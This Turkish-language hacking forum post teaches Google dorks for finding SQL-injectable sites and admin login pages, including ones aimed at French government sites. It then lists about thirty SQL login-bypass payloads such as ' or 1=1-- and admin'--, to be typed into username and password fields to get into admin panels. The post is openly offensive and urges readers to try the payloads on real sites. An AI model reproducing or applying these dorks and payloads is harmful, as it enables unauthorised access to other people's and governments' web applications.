SQL DORK VE LOGİN SQL BYPASS
SQL DORK
Sql hatası alabileceğimiz sitelere ulaşmak için dork Oluşturma.
1.(inurl:...)
inurl:'dan sonra, sitenin içinde bulunmasını istediğimiz kelimyei yazabiliriz. Hangi dilde yazarsak kelimeyi büyük bir ihtimal o dili kullanan milletlerin oluşturduğu sitelerle karşılaşırız.
Kod:
inurl:école
2.(.php? - .asp? - .aspx)
Kelimenin yanına sunucu dili uzantısı(.php? - .asp? - .aspx) eklenilebilir.
Kod:
inurl:école.php?
3.(id=)
En sona "id=" değerini ekliyebiliriz.
Kod:
inurl:école.php?id=
4.(site:...)
Dorku daha da özelleşirebiliriz, site:'dan sonra ülke uzantısı yazarak belirttiğimiz ülkenin sitelerine oluşabiliriz.
Kod:
inurl:école.php?id= site:.fr
5.(Web Uzantısı)
Dorku özelleştiriken web uzantısını da belirtebiliriz.
Kod:
inurl:école.php?id= .gov (.gov uzantısını devlet siteleri kullanır.)
6.(Ülke uzantısı + Web sitesi uzantısı)
Hedef ülekinin uzantısı ile web uzantılarını beraber kullabiliriz.
Kod:
inurl:école.php?id= .gov.fr
LOGİN SQL BYPASS
Bypass: Alternatif yolları kullanarak asıl yolu atlatmaktır.
Admin Panel girişte kullanacağımız bypass edici kodları ile admin panele girbiliriz. Bu açık her sitede mevcut değildir ancak login sql bypass'ı denediğinizde farkına varacaksınız ki bir çok yerde bu bypass edici kodlar ile admin panele giriş yapabileceksiniz.
Bypass edici Kodları:
Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"
Username ve Password'u bu bypass edici kodları kullanarak geçebiliriz.
Login Sql Bypass dorkaları: (Bunları kendinize göre özelleştirebilirsiniz.)
Kod:
İnurl:admin/login.php
İnurl:admin/login.asp
İnurl:admin/login.aspx
İnurl:login.php
İnurl:login.asp
İnurl:login.aspx
İnurl:admin/index.php
İnurl:admin/index.asp
İnurl:admin/index.aspx
İnurl:administrator.php
İnurl:administrator.asp
İnurl:administrator.aspx
İnurl:adminlogin.php
İnurl:adminlogin.asp
İnurl:adminlogin.aspx
Sql İnjection'ı da anlattım bundan sonra onu okumanız, öğrenmek ve öğrendiklerinizi uygulayabilmek açısından daha yararlı olacaktır:https://www.turkhackteam.org/web-se...63239-manuel-sql-injection.html#post9291135
Son düzenleme: